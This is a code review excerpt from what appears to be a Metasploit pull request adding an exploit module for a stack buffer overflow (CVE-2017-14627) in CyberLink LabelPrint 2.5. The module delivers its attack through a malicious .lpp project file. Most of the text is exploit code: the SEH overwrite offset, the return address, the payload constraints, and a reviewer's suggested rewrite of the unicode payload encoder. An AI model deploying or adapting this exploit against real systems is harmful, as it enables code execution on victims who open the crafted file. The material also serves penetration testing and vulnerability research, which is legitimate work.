modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb

```diff
@@ -0,0 +1,155 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "CyberLink LabelPrint 2.5 Stack Buffer Overflow",
+      'Description'    => %q{
+       This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
+       The vulnerability is triggered when opening a .lpp project file containing overly long string characters
+       via open file menu. This results in overwriting a structured exception handler record and take over the
+       application. This module has been tested on Windows 7x64.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'modpr0be <tom@spentera.id>',       # initial discovery and metasploit module
+          'f3ci <marie@spentera.id>'            # unicode kungfu
+        ],
+      'References'      =>
+        [
+          [ 'CVE', '2017-14627' ],
+          [ 'EDB', '42777' ]
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'seh',
+          'DisablePayloadHandler' => 'true'
+        },
+      'Platform'        => 'win',
+      'Targets'         =>
+        [
+          ['CyberLink LabelPrint <= 2.5 (Win 7x64)', { 'Ret' => "\x2c\x44", 'Offset' => 790 } ]
+        ],
+      'Payload'         =>
+        {
+          'Space'       => 15000,
+          'BadChars'    => "\x00",    #badchars starts from 80 until the rest of it.
+          'DisableNops' => true
+        },
+      'DisclosureDate'  => 'Sep 23 2017',
+      'DefaultTarget'   => 0))
+
+    register_options(
+    [
+      OptString.new('FILENAME', [true, 'The malicious file name', 'msf.lpp'])
+    ])
+  end
+
+  def get_payload(hunter)
+
+    [ 'x86/unicode_mixed' ].each { |name|
```

Comment:
I'm guessing this loop was created with the intention of adding other encoders later.

The current implementation doesn't really make sense when there's only one encoder specified. Also, the `if name` conditional will always match.

Perhaps I'm missing something, but this method could be simplified to:

```ruby
  def get_payload(hunter)
      enc = framework.encoders.create('x86/unicode_mixed')
      enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
      enc.encode(hunter, nil, nil, platform)
  end
```

Reply:
This works also! I will merge all suggestions on the next commit. Still trying on Windows 8.1 and Windows 10.